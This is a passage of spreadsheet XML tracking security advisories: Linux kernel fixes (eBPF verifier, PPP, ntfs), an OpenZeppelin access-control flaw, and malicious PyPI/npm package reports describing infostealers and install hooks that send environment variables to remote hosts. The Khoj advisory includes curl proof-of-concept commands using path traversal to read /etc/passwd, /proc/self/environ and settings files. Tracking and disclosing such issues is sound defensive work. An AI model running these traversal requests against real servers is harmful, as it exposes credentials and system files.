  // `b` is PTR_TO_MAP_VALUE | PTR_MAYBE_NULL
  void *a = bpf_rdonly_cast(0, 0);
  int  *b = bpf_map_lookup_elem(...);
  if (a == b)
    *b = 42;  // verifier does not catch null pointer dereference
This happens because of a special case in check_cond_jmp_op(),
which attempts to strip PTR_MAYBE_NULL flags from pointer types,
when processing comparisons like `rA == rB`, if either rA or rB can't
be null.
The non-null property is derived based on the absence of
PTR_MAYBE_NULL flag on rA's or rB's type. But that is not sufficient
for types like PTR_TO_MEM, as in the example.
This patch replaces type_may_be_null() call with reg_not_null(),
which contains an allowlist of types for which absence of
PTR_MAYBE_NULL actually means that the value can't be NULL at runtime.
At the moment, the list in the reg_not_null() omits two types for
which PTR_MAYBE_NULL is applicable: PTR_TO_XDP_SOCK and PTR_TO_BUF.
In order to remain backward compatible, and assuming that only
comparison between pointers of the same type makes sense,
this commit extends reg_not_null(). W/o such an extension e.g.
verifier_jeq_infer_not_null/null_ptr_to_map_value fails.
reg_not_null() can be extended further, but I deem that out of scope
for the fix at hand. Explicit base_type(...) != PTR_TO_BTF_ID
checks in the check_cond_jmp_op() can be removed with migration to
reg_not_null(), but that is a behavioural change, as the special case
would start matching for PTR_TO_BTF_ID that is also is_trusted_reg().
I omit the behavioural change from this commit.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98134</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98137</t>
        </is>
      </c>
      <c r="D353" s="5" t="inlineStr"/>
      <c r="E353" s="5" t="inlineStr"/>
      <c r="F353" s="5" t="inlineStr"/>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr"/>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: treat any nonzero dio zero-range return as an error
ntfs_dio_zero_range() returns either 0 or a negative errno from
blkdev_issue_zeroout(); it never returns a positive value.  The
zeroing failure check in ntfs_attr_fallocate() therefore never fired,
so a failed zeroing operation was silently ignored: the loop kept
going, the newly allocated clusters were folded into initialized_size
and the write could succeed leaving stale on-disk data.
Treat any nonzero return as an error and abort the allocation.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98137</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98151</t>
        </is>
      </c>
      <c r="D354" s="5" t="inlineStr"/>
      <c r="E354" s="5" t="inlineStr"/>
      <c r="F354" s="5" t="inlineStr"/>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr"/>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix REG INVARIANTS VIOLATION on speculative pointer arithmetic
Take the following unprivileged program as an example:
	r0 = bpf_map_lookup_elem(...)	/* PTR_TO_MAP_VALUE, offset 0 */
	...
	14: r0 += r1			/* r1 is a bounded scalar */
	15: r9 = r0
Loading it triggers a verifier warning from reg_bounds_sanity_check():
	verifier bug: REG INVARIANTS VIOLATION (alu): const subreg tnum out
	of sync with range bounds r64={.base=0x0, .size=0x0}
	r32={.base=0x0, .size=0xffffffff} var_off=(0x0, 0x0)
What happens:
1. Processing insn 14 (r0 += r1) in adjust_ptr_min_max_vals(), the new
   offset is computed into dst_reg's var_off and 32/64-bit ranges.
2. Because pointer registers do not track 32-bit subregister bounds,
   __mark_reg32_unbounded() first sets r32 to the full range; r32 is
   re-derived from the offset at the end of the function by
   reg_bounds_sync().
3. On the unprivileged path, sanitize_ptr_alu() is called and, via
   sanitize_speculative_path() -&gt; push_stack(), snapshots the current
   register state and schedules the next instruction (insn 15) to be
   verified directly as a speculative path.
4. That snapshot is taken between step 2 and the final reg_bounds_sync():
   at this point dst_reg's var_off still holds the (const) original
   offset while r32 has just been blanked to the full range, i.e. the two
   are out of sync. When the speculative path later verifies insn 15
   (r9 = r0), the inconsistent state reaches reg_bounds_sanity_check() and
   trips the warning.
var_off and the 32-bit range must always be consistent. There are two
ways to keep the snapshot consistent:
  1. sync var_off and r32 before the snapshot so they match, or
  2. leave r32 at its original (already consistent) value and blank it
     only after the snapshot.
The whole point of sanitize_ptr_alu() is to insert a harmless masking
sequence that keeps the access in bounds under speculation, so the state
it snapshots should faithfully represent that. Take approach 2: move
__mark_reg32_unbounded() to after sanitize_ptr_alu(), so the speculative
snapshot keeps the pointer's original, consistent r32. The non-speculative
path is unchanged: r32 is still blanked before the offset is applied and
re-derived by reg_bounds_sync().</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98151</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98158</t>
        </is>
      </c>
      <c r="D355" s="5" t="inlineStr"/>
      <c r="E355" s="5" t="inlineStr"/>
      <c r="F355" s="5" t="inlineStr"/>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr"/>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ppp_async: drop the errored frame instead of resetting its headroom
ppp_receive_nonmp_frame() prepends a two-byte direction tag before running
the pass/active BPF filters:
	*(__be16 *)skb_push(skb, 2) = htons(PPP_FILTER_INBOUND_TAG);
Nothing on the receive path guarantees those two bytes of headroom. The
frame-error path in ppp_async's process_input_packet() resets a reused skb's
headroom to zero while claiming to restore it to a freshly allocated state -
but a fresh skb from dev_alloc_skb() carries NET_SKB_PAD:
	err:
		if (skb) {
			/* make skb appear as freshly allocated */
			skb_trim(skb, 0);
			skb_reserve(skb, - skb_headroom(skb));
		}
ap-&gt;rpkt still points at that skb, so the next frame is reassembled into it
with no headroom at all. A peer that sends a bad-FCS frame followed by one
beginning ff 03 then leaves a single byte of headroom by the time the filter
tag is pushed, which lands one byte below skb-&gt;head:
  skbuff: skb_under_panic: len:49 put:2 head:ffff888003c10000
          data:ffff888003c0ffff tail:0x30 end:0x640 dev:&lt;NULL&gt;
  kernel BUG at net/core/skbuff.c:214!
  RIP: 0010:skb_panic+0x13e/0x230
  Call Trace:
   skb_push+0xbd/0x100
   ppp_receive_nonmp_frame+0x48a/0x1d10
   ppp_input+0x4e9/0x2f80
   ppp_async_process+0x2a/0xe0
   tasklet_action_common+0x20f/0x8a0
   handle_softirqs+0x18e/0x590
  Kernel panic - not syncing: Fatal exception in interrupt
Zeroing the headroom violates the NET_SKB_PAD guarantee that dev_alloc_skb()
gives the rest of the receive path. Besides the filter panic above, when CCP
compression is enabled ppp_decompress_frame() hands skb-&gt;data - 2 to
-&gt;decompress()/-&gt;incomp(), which then reads out of bounds before skb-&gt;head
for the same reason.
Rather than restore the headroom, drop the errored frame - as ppp_synctty
already does on its error path - and clear ap-&gt;rpkt so the next frame is
reassembled into a fresh skb with proper headroom. This is simpler and fixes
both the filter under-panic and the CCP out-of-bounds read.
The original V1 of this patch made room in ppp_receive_nonmp_frame() with
skb_cow_head(); Eric pointed out that fixing the root cause in the transport
is the right approach.
Found by fuzzing the PPP receive path with a mutating peer on a pty; it is an
interesting (remote) DoS: root configures PPP, the peer supplies two crashing
frames. The reproducer (repro-ppp-skb.c, unchanged from v1) panics in about a
second, and returns cleanly with this applied.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98158</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98159</t>
        </is>
      </c>
      <c r="D356" s="5" t="inlineStr"/>
      <c r="E356" s="5" t="inlineStr"/>
      <c r="F356" s="5" t="inlineStr"/>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr"/>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7921: validate CLC firmware records
The CLC region is supplied by firmware, but the loader trusts the
region count and each record length. A malformed image can make the
region table pointer precede the firmware buffer, make the record loop
fail to advance, or index phy-&gt;clc past its end. Validate the table and
record bounds before dereferencing or copying.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98159</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98160</t>
        </is>
      </c>
      <c r="D357" s="5" t="inlineStr"/>
      <c r="E357" s="5" t="inlineStr"/>
      <c r="F357" s="5" t="inlineStr"/>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr"/>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix mismatched free of HalData in rtw_sdio_if1_init()
padapter-&gt;HalData is allocated via vzalloc(), but incorrectly freed
using kfree() in the rtw_sdio_if1_init() error path. Using kfree() to
release this vmalloc-backed buffer can lead to memory corruption.
Use rtw_hal_data_deinit() to pair the free correctly and free
HalData with vfree().
The bug was first flagged by an experimental static analysis tool we
are developing for kernel memory-management bugs. Manual inspection
confirms that the issue is still present in current mainline.
An x86_64 allyesconfig build showed no new warnings. As we do not have
suitable RTL8723BS SDIO hardware to test with, no runtime testing was
able to be performed.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98160</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
      <c r="D358" s="5" t="inlineStr"/>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr">
        <is>
          <t>npm:@openzeppelin/confidential-contracts</t>
        </is>
      </c>
      <c r="M358" s="5" t="inlineStr">
        <is>
          <t>0.3.2, 0.4.2, 0.5.2</t>
        </is>
      </c>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr"/>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>### Impact
Two locations consume an encrypted handle returned by an untrusted external party and use it without verifying that the party is ACL-authorized on it.
#### `VestingWalletConfidential`
Malicious users can call `release` with a malicious token. This token could return an alternative handle on `confidentialBalanceOf`, which represents the balance of the vesting wallet on an alternative ERC-7984 token (or any other handle that the vesting wallet has access to). The vesting wallet does not check that the token has ACL access and grants access to a new handle derived from the returned handle.
Effectively, this bug allows a malicious user to gain information about any private `euint64` handle that the vesting wallet has access to via a malicious ERC-7984 token. There is no loss of funds.
#### ERC7984
On a transfer with callback, `ERC7984` uses the `ebool` returned by the
recipient's `IERC7984Receiver.onConfidentialTransferReceived` to drive the refund
logic, without checking that the recipient has ACL access to it. A malicious recipient
can return any `ebool` the token has access to and recover its plaintext from the
refund result, which the token grants the caller access to. The leak is limited
to `ebool` handles (the value is only used as an `FHE.select` condition), and
there is no loss of funds.
### Patches
Both issues were fixed in the same patch releases: v0.5.2, v0.4.2, v0.3.2
- `VestingWalletConfidential`: 93e75ceed2b9648f53f9d133f431064353456805 (#423).
- `ERC7984` transfer callback: fe0863af2c9dce7614acce98720a913bf6a767a5 (#428), with follow-up ee47edf189ab681cebdad18bfb53dee541987be2 (#431) permitting an uninitialized returned handle.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
      <c r="D359" s="5" t="inlineStr"/>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>PyPI:khoj</t>
        </is>
      </c>
      <c r="M359" s="5" t="inlineStr">
        <is>
          <t>2.0.0-beta.25</t>
        </is>
      </c>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr"/>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `/home/{file_path:path}` endpoint in `web_client.py` serves static files by directly concatenating the user-supplied `file_path` with the `home_directory` constant. There is no path traversal filtering, no path normalization check, and no authentication required. An attacker can use `../` sequences to read arbitrary files from the server filesystem.
### Details
**Vulnerable code** — `src/khoj/routers/web_client.py` lines 46-49:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    """Serve static files from the home landing page directory"""
    return FileResponse(constants.home_directory / file_path)
```
Where `home_directory` is defined in `src/khoj/utils/constants.py` line 6:
```python
home_directory = web_directory / "home/"
```
**What is missing:**
- No `..` traversal filtering
- No path normalization/resolution check (e.g., `resolved.is_relative_to(home_directory)`)
- No authentication decorator (`@requires(["authenticated"])` is absent)
- Starlette's `FileResponse` does NOT perform path traversal protection
**Path resolution:**
```
Request: GET /home/../../../../../../../etc/passwd
file_path = "../../../../../../../etc/passwd"
home_directory / file_path = /app/src/khoj/interface/web/home/../../../../../../../etc/passwd
OS resolves to: /etc/passwd
```
### PoC
```bash
# Read /etc/passwd (no authentication required)
curl http://localhost:42110/home/../../../../../../../etc/passwd
# Read application settings (may contain SECRET_KEY, DB credentials)
curl http://localhost:42110/home/../../../../settings.py
# Read environment file
curl http://localhost:42110/home/../../../../../../../proc/self/environ
```
URL-encoded variant (may bypass some reverse proxy normalization):
```bash
curl http://localhost:42110/home/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
### Impact
Unauthenticated arbitrary file read. An attacker with network access to the Khoj instance can:
- **Read application configuration** — Django `SECRET_KEY`, database credentials, API keys
- **Read system files** — `/etc/passwd`, `/etc/shadow` (if permissions allow), `/proc/self/environ`
- **Exfiltrate sensitive data** — Any file readable by the server process
- **Facilitate further attacks** — Leaked credentials enable deeper compromise
**No authentication required** — the endpoint has no auth decorators, making it exploitable by any network-reachable attacker.
### Recommended fix
Use FastAPI's built-in `StaticFiles` mount instead of a custom handler, or add explicit path validation:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    resolved = (constants.home_directory / file_path).resolve()
    if not resolved.is_relative_to(constants.home_directory.resolve()):
        raise HTTPException(status_code=404)
    return FileResponse(resolved)
```</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>GHSA-7qx8-98q7-66p4</t>
        </is>
      </c>
      <c r="D360" s="5" t="inlineStr"/>
      <c r="E360" s="5" t="inlineStr"/>
      <c r="F360" s="5" t="inlineStr"/>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr">
        <is>
          <t>npm:@nubjs/types</t>
        </is>
      </c>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr"/>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1b292cfe4598353bc8491677099fd2c056f4136eb686345bbdbe68fa887e368c)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60" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17186</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17181</t>
        </is>
      </c>
      <c r="D361" s="5" t="inlineStr"/>
      <c r="E361" s="5" t="inlineStr"/>
      <c r="F361" s="5" t="inlineStr"/>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>PyPI:reqparser</t>
        </is>
      </c>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr"/>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (982923c14e644e82a839621d37715fd123568fc378aed45b6afa6247bc0b5054)
During the module import, the package starts an infostealer. It exfiltrates data from crypto currency wallets and web browsers, ensures persistence and installs further malware.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-reqparser
Reasons (based on the campaign):
 - malware
 - persistence
 - exfiltration-crypto
 - exfiltration-browser-data
 - The package contains code to detect if it is running in a sandbox environment.
 - infostealer
 - keylogger
</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17181</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17182</t>
        </is>
      </c>
      <c r="D362" s="5" t="inlineStr"/>
      <c r="E362" s="5" t="inlineStr"/>
      <c r="F362" s="5" t="inlineStr"/>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>npm:app-sca-info-banking</t>
        </is>
      </c>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr"/>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9733b1d7500efca385ba6dc866f4ef1b04e0d1cd4ead564b9445551a2d72a51b)
package.json declares scripts.postinstall: `node poc.js`, causing poc.js to execute automatically on npm install. poc.js issues DNS (dns.resolve4) and HTTP (http.get) callbacks to unique subdomains under ki6rmdjnq5q8y7v8soxc080fz65ytohd.oastify.com (a Burp Suite Collaborator / OAST host) and writes a marker file under os.tmpdir(). The package's main entry is an empty stub (module.exports = {}); the postinstall payload is the package's only functionality. The DNS/HTTP callbacks to an attacker-controlled OAST domain confirm arbitrary code execution on the installer's host and leak install-event metadata to a third-party endpoint.
## Source: ossf-package-analysis (3f5e6f43a1552d09c016e2db6c287a1972a70df70fa7a42d3049840d04580bd4)
The OpenSSF Package Analysis project identified 'app-sca-info-banking' @ 0.0.24 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17182</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17183</t>
        </is>
      </c>
      <c r="D363" s="5" t="inlineStr"/>
      <c r="E363" s="5" t="inlineStr"/>
      <c r="F363" s="5" t="inlineStr"/>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>pypi, go</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>PyPI:tego-managed-agents-test</t>
        </is>
      </c>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr"/>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72c8a01de8d706d83a4b80b845099c11602ba778a392337cad2d9a8a40090b5d)
The package's custom install command serializes the entire process environment (dict(os.environ)) to JSON and POSTs it to the hardcoded endpoint https://gateway.tego.security during `pip install`. The exfiltration runs automatically as part of the install lifecycle without user consent, and exceptions are silently swallowed so no error is surfaced to the installer. Because process environments on developer and CI hosts routinely contain credentials (AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN, database passwords, and other secret-shaped variables), this indiscriminate bulk-environment upload is a credential-harvesting exfiltration path from installer to a remote author-controlled host.
## Source: kam193 (b09488c67894dd74d043a240308c694f0e42464e3a4f371b8d5ebc8a6a589d7b)
During installation, the code exfiltrates all environment variables to a remote location.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-tego-managed-agents-test
Reasons (based on the campaign):
 - exfiltration-env-variables
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17183</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
